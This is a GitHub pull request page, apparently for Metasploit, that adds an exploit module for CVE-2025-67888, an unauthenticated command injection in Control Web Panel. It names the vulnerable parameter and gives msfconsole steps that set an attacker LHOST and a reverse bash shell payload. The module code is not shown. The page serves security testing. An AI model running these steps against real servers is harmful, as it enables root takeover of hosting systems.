add module for CVE-2025-67888 #20806
Open
+200
−0
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Fixes #20788
Add Control Web Panel API Command Injection Exploit (CVE-2025-67888)
This PR adds a new exploit module for CVE-2025-67888, an unauthenticated OS command injection vulnerability in Control Web Panel (CWP) versions <= 0.9.8.1208.
What does this change do?
Adds
exploit/linux/http/control_web_panel_api_cmd_execwhich exploits a blind command injection via thekeyGET parameter in/admin/index.phpwhenapi=1is set. Successful exploitation grants root-level access.Prerequisites: Softaculous and/or SitePad must be installed via CWP Scripts Manager.
Files Added
modules/exploits/linux/http/control_web_panel_api_cmd_exec.rbdocumentation/modules/exploit/linux/http/control_web_panel_api_cmd_exec.mdVerification
msfconsoleuse exploit/linux/http/control_web_panel_api_cmd_execset RHOSTS <target>set RPORT 2031set SSL trueset LHOST <attacker>checkset payload cmd/unix/reverse_bashexploitReferences